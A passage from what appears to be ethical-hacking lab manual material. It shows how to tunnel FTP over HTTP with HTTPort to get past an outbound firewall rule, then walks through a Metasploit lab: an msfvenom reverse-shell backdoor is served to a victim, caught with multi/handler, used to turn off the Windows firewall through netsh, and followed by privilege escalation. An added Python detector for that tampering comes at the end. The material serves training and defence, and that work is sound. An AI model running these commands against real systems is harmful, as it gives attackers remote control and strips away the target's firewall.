35. In the New Outbound Rule Wizard, select Port as the Rule Type, and click Next.
37. Under Action, Block the connection is selected by default; click Next.
38. In the Profile section, ensure that all the options (Domain, Private, and Public) are checked, and click Next.
39. Under Name, type Port 21 Blocked in the Name field, and click Finish.
40. The new rule Port 21 Blocked is created, as shown in the screenshot.
42. The Properties window for the Port 21 Blocked rule appears.
43. Select the Protocols and Ports tab; in the Remote port field, select the Specific Ports option from the drop-down list, and enter the port number as 21.
44. Leave the other default settings, click Apply, and then click OK.
45. Disable the rule and check if you are able to connect to the ftp site.
46. Right-click the newly added rule, and click Disable Rule.
47. Launch the command prompt, and issue ftp 10.10.10.10.
Enter the username and password when prompted.
Note: In the above-mentioned command, 10.10.10.10 refers to the IP address of the Windows 10 machine where the ftp site is located. Make sure that you issue the IP address of Windows 10 in your lab environment.
48. This means you are able to establish an FTP connection.
49. Now, enable the rule, and check to see whether you can establish a connection.
50. Right-click the newly added rule, and click Enable Rule.
51. Launch the Command Prompt and check whether you are able to connect to the ftp site by issuing the command ftp 10.10.10.10.
52. The added outbound rule should block the connection, as shown in the screenshot.
Note: In the above-mentioned command, 10.10.10.10 refers to the IP address of Windows 10 where the ftp site is located. Make sure that you issue the IP address of Windows 10 in your lab environment.
53. Now, we shall perform tunneling using HTTPort to establish a connection with the FTP site located on Windows 10.
54. Navigate to Z:\CEH-Tools\CEHv10 Module 12 Evading IDS, Firewalls, and Honeypots\HTTP Tunneling Tools\HTTPort, and double-click httport3snfm.exe.
55. If the Open File - Security Warning pop-up appears, click Run.
56. Follow the installation steps to install HTTPort.
57. Launch HTTPort (Httport3SNFM) from the Start menu.
58. An Introduction to HTTPort wizard appears; click Next five times, until you come to the last wizard pane, and then click Close.
59. The HTTPort main window (HTTPort 3SNFM) appears, as shown in the screenshot.
60. On the Proxy tab, enter the Host name or IP address (10.10.10.12) of the machine where HTTHost is running (Windows Server 2012).
Note: The IP address of the Windows Server 2012 may vary in your lab.
61. Enter the Port number 90.
62. Under Misc. options, Bypass mode, select Remote host from the drop-down list.
63. Under Use personal remote host at (blank = use public), re-enter the IP address of Windows Server 2012 (10.10.10.12) and port number 90.
64. Enter the password magic in the Password field.
65. Select the Port mapping tab, and click Add to create a new mapping.
Note: In this kind of environment, the federated search web part of Microsoft Search Server 2008 will not work.
66. Right-click the New mapping node and click Edit.
67. Rename this to ftp (you can enter a name of your choice).
68. Right-click the node below Local port, then click Edit, and enter the port value as 21.
69. Right-click the node below Remote host, click Edit, and rename it as 10.10.10.10.
70. Right-click the node below Remote port, then click Edit, and enter the port value as 21.
Note: 10.10.10.10 specified in the Remote host node is the IP address of the Windows 10 machine that is hosting the FTP site.
71. Switch to the Proxy tab, and click Start to begin the HTTP tunneling.
72. HTTPort intercepts the ftp request to the localhost and tunnels it through HTTHost, which is installed on the remote machine, to connect you to 10.10.10.10.
73. This means you may not access the ftp site directly by issuing ftp 10.10.10.10 at the command prompt, but you will be able to access it through the local host by issuing the command ftp 127.0.0.1.
74. Launch Command Prompt and type ftp 10.10.10.10. Press Enter. The ftp connection will be blocked by the outbound firewall rule.
75. Now launch a new Command Prompt, type ftp 127.0.0.1 and press Enter. You should be able to connect to the site.
Note: If you issue this command without starting HTTPort, the connection to the FTP site fails, stating that the FTP connection is refused.
76. Enter the credentials of any user account of Windows 10. In this lab, we are using the credentials of the Jason account (Username: Jason, Password: qwerty). Type the username (Jason) and press Enter.
Note: The password you enter won't be visible.
77. You are successfully logged in, even after adding a firewall outbound rule, inferring that a tunnel has been established by HTTPort and HTTHost, bypassing the firewall.
78. Now you have access to all files in the ftp directory located in the Windows 10 virtual machine.
79. Type mkdir Test and press Enter.
80. A directory named Test will be created in the FTP folder on the Windows 10 (location: C:\FTP) virtual machine, as shown in the screenshot.
81. Thus, you are able to bypass HTTP proxies as well as firewalls, and thereby access files beyond them.
Note: On completion of the lab, delete the created outbound rule, stop HTTHost and HTTPort, and disable the firewall (which was enabled in the beginning of the lab) on the machine (i.e., Windows Server 2016), and start the World Wide Web Publishing Service on the Windows Server 2012 virtual machine.

Lab Analysis
Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Bypassing Windows Firewall using Metasploit

Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.
Lab Scenario
Large companies are common targets for hackers and attackers of all stripes, and it is not uncommon for these companies to actively monitor traffic to and from their critical IT infrastructure. Judging by the functionality of Trojans, we can safely surmise that they are designed to open back doors on compromised computers, allowing remote attackers to monitor activity and steal information. Once installed in a corporate network, the Trojan's backdoor feature also allows attackers to use the initially compromised computer as a springboard to launch further forays into the rest of the infrastructure, resulting in the possible theft of a wealth of information, which could be far greater than any that exists on a single machine.
The basic principle of all malicious programs is that they require user support to damage the initial computer. That is why Trojan horses try to deceive users by displaying some other form of email. Backdoor programs are used to gain unauthorized access to systems, and backdoor software is used by hackers to gain access to systems, so that they can send the malicious software to that particular system. Hackers/attackers infect target environments with customized Trojan horses (backdoors) to determine exploitable holes in security systems.
As a Security Administrator of your organization, your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, the theft of valuable data/identities, privilege escalation, persistent backdoors, and so on.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of this lab include:
* Creating a server and testing the network for attack
* Attacking a network using a simple backdoor and bypassing the firewall

Lab Environment
To complete this lab, you will need:
* A computer running Windows Server 2016
* Kali Linux running in a virtual machine (Attacker machine)
* Windows Server 2012 running in a virtual machine (Victim machine)
* A web browser with Internet access
* Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data so that it can obtain control of a computer or system and cause damage, such as ruining file allocation tables on a hard drive.

Lab Tasks
1. Before running this lab, log into Windows Server 2012 and turn ON Windows Firewall.
2. Turning on Windows Firewall ensures that the computer is secure.
3. Now, go to Start > Administrative Tools > Windows Firewall with Advanced Security. The Windows Firewall with Advanced Security window appears, displaying the Firewall status in all the profiles as shown in the screenshot.
4. Close the window.
5. Now, you will need to bypass this Firewall and launch a meterpreter session. Once launched, you will be shown how to disable the Firewall on the target machine through the meterpreter shell.
6. Log in to the Kali Linux virtual machine.
7. Type root in the Username text field, and click Next.
8. Type toor in the Password text field, and click Unlock.
9. Click the Terminal icon from the taskbar.
10. Type the command msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Backdoor.exe in the terminal window and press Enter.
Note: 10.10.10.11 is the IP address of Kali Linux, which might differ in your lab environment.
11. The above command creates a Windows executable file named "Backdoor.exe," which will be saved on the Kali Linux Desktop.
12. Now, you need to share Backdoor.exe with the victim machine (in this lab, the Windows Server 2012).
13. Open a new command line terminal, type mkdir /var/www/html/share and press Enter to create a new directory named "share."
14. Change the mode of the share folder to 755 by typing the command chmod -R 755 /var/www/html/share/ and pressing Enter.
15. Change the ownership of that folder to www-data by typing chown www-data:www-data /var/www/html/share/ and pressing Enter.
16. Type ls -la /var/www/html/ | grep share and press Enter.
17. Start the apache server: type service apache2 start in the Terminal.
Note: If you don't have apache2 installed, run apt-get install apache2 as root.
18. The apache web server is now running; copy Backdoor.exe into the share folder.
19. Type cp /root/Desktop/Backdoor.exe /var/www/html/share/ in the terminal and press Enter.
20. Launch msfconsole.
21. Type use exploit/multi/handler and press Enter to handle exploits launched outside the framework.
22. Issue the following commands in msfconsole:
a) Type set payload windows/meterpreter/reverse_tcp and press Enter.
b) Type set LHOST 10.10.10.11 and press Enter.
c) Type show options and press Enter to display all the options assigned to the payload.
23. The IP address entered in LHOST refers to the attacker machine (i.e., Kali Linux) and it might vary in your lab environment.
24. To start the handler, type exploit -j -z and press Enter.
25. Switch back to the Windows Server 2012 virtual machine. Observe that the Firewall is ON.
26. Launch Mozilla Firefox (or another web browser), and type http://10.10.10.11/share in the address field. Then press Enter.
Note: Here, 10.10.10.11 is the IP address of Kali Linux, which may differ in your lab environment.
27. Click Backdoor.exe to download the backdoor file.
28. The Opening Backdoor.exe pop-up appears; click Save File.
29. Close the browser.
30. By default, this file is stored in C:\Users\Administrator\Downloads.
Note: The download location might vary in your lab environment.
31. Navigate to the download location (here, C:\Users\Administrator\Downloads), and double-click Backdoor.exe.
32. If the Open File - Security Warning appears, click Run.
33. Close the Downloads window.
34. Switch back to the Kali Linux machine. The Meterpreter session has been successfully opened, as shown in the screenshot.
35. Type sessions and press Enter to view the active sessions.
36. Type sessions -i 1 and press Enter ("1" in "sessions -i 1" is the session id number). The Meterpreter shell is launched, as shown in the screenshot.
37. Type execute -f cmd.exe -c -H and press Enter. This creates a channel through which you can access the command shell of the victim machine.
38. Note the Channel number (here, 1).
39. Type interact 1 and press Enter.
40. This allows you to interact with the command shell of the victim machine.
41. Type netsh firewall show opmode and press Enter. This displays the status of the firewall on the victim machine.
42. Observe that all the firewall configurations are enabled.
43. Type netsh advfirewall set allprofiles state off and press Enter. This turns off the firewall state for all the profiles on the victim machine.
44. If the firewall is successfully disabled, it returns the message OK.
45. Thus, you have successfully launched the meterpreter shell and disabled the firewall on the target machine.
46. Now switch back to the Windows Server 2012 and view the firewall profiles in the Windows Firewall with Advanced Security control panel.
47. It is observed that the firewall in all the profiles has been successfully turned off, as shown in the above screenshot.
48. Switch back to Kali Linux, type exit in the command-line terminal, and press Enter.
49. You will come back to the meterpreter shell, as shown in the screenshot.
50. Type getsystem and press Enter. Doing this might help in gaining system-level privileges remotely.
Note: This command works only on Server machines such as Windows Server 2012 and 2016.
51. Type ps and press Enter. This lists all the processes running on the machine.
52. You may issue the help command to view the other post-exploitation commands.

Lab Analysis
Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Platform Supported: Classroom, iLabs
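Steps 41 to 44 of the lab above leave a clear trail on the victim: a cmd.exe whose parent is the dropped binary, then netsh querying and disabling the firewall. The following added example (not part of the lab manual) runs that detection logic over constructed Windows process-creation events. It assumes a flat key=value rendering of Security event 4688 with a ParentProcess field; the native 4688 event on older Windows versions does not carry the parent name, but Sysmon event ID 1 and current Windows versions do.

```python
"""Detect the firewall tampering performed in steps 41-44 of the lab above:
a command shell spawned from an unexpected parent, followed by
"netsh advfirewall set allprofiles state off".

Added example, not from the lab manual. The events are constructed in a
flat key=value rendering of Windows Security event 4688 (process creation
with command-line auditing on). The ParentProcess field is an assumption:
older Windows versions' native 4688 lacks the parent name, Sysmon event 1
and current Windows versions carry it.
"""
import re

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Parents that normally launch an interactive cmd.exe; tune for your estate.
EXPECTED_CMD_PARENTS = {"explorer.exe", "services.exe", "svchost.exe",
                        "winlogon.exe", "powershell.exe", "cmd.exe"}

# Constructed 4688 events from the victim (Windows Server 2012) during the lab.
SAMPLE_EVENTS = [
    r'EventID=4688 User=Administrator NewProcess=C:\Users\Administrator\Downloads\Backdoor.exe '
    r'ParentProcess=C:\Windows\explorer.exe CommandLine="C:\Users\Administrator\Downloads\Backdoor.exe"',
    # meterpreter "execute -f cmd.exe -c": a cmd.exe whose parent is the dropped binary
    r'EventID=4688 User=Administrator NewProcess=C:\Windows\System32\cmd.exe '
    r'ParentProcess=C:\Users\Administrator\Downloads\Backdoor.exe CommandLine="cmd.exe"',
    r'EventID=4688 User=Administrator NewProcess=C:\Windows\System32\netsh.exe '
    r'ParentProcess=C:\Windows\System32\cmd.exe CommandLine="netsh firewall show opmode"',
    r'EventID=4688 User=Administrator NewProcess=C:\Windows\System32\netsh.exe '
    r'ParentProcess=C:\Windows\System32\cmd.exe CommandLine="netsh advfirewall set allprofiles state off"',
    # benign activity that must not alert
    r'EventID=4688 User=Administrator NewProcess=C:\Windows\System32\cmd.exe '
    r'ParentProcess=C:\Windows\explorer.exe CommandLine="cmd.exe"',
    r'EventID=4688 User=Administrator NewProcess=C:\Windows\System32\netsh.exe '
    r'ParentProcess=C:\Windows\System32\cmd.exe CommandLine="netsh interface ip show config"',
    r'EventID=4624 User=Jason LogonType=3',
]


def parse_event(line):
    """Parse one flat key=value line into a dict, stripping surrounding quotes."""
    return {key: (value[1:-1] if value.startswith('"') else value)
            for key, value in FIELD_RE.findall(line)}


def basename(path):
    """Lowercased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def netsh_args(cmdline):
    """Lowercased argument string when the command line invokes netsh, else None."""
    tokens = cmdline.replace('"', "").lower().split()
    if tokens and basename(tokens[0]) in ("netsh", "netsh.exe"):
        return " ".join(tokens[1:])
    return None


def classify(event):
    """(rule, severity) for one parsed 4688 event, or None if nothing fires."""
    proc = basename(event.get("NewProcess", ""))
    parent = basename(event.get("ParentProcess", ""))
    args = netsh_args(event.get("CommandLine", ""))
    if args is not None:
        # step 43 of the lab, plus the legacy "netsh firewall set opmode" spelling
        if ("advfirewall set" in args and "state off" in args) or \
                ("firewall set opmode" in args and "disable" in args):
            return ("firewall_disabled", "critical")
        if "firewall show" in args:  # step 41: "netsh firewall show opmode"
            return ("firewall_state_queried", "low")
    if proc == "cmd.exe" and parent not in EXPECTED_CMD_PARENTS:
        return ("shell_from_unexpected_parent", "high")
    return None


def scan(lines):
    """Run the rules over 4688 lines; other event IDs are skipped."""
    findings = []
    for index, line in enumerate(lines):
        event = parse_event(line)
        if event.get("EventID") != "4688":
            continue
        hit = classify(event)
        if hit is not None:
            findings.append({"line": index, "rule": hit[0], "severity": hit[1],
                             "command": event.get("CommandLine", "")})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']:8}] line {f['line']}: {f['rule']} <- {f['command']}")
```

The sequence shell-from-unexpected-parent, firewall query, firewall disable within seconds is the signal to correlate; a single low-severity query on its own is routine administration.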
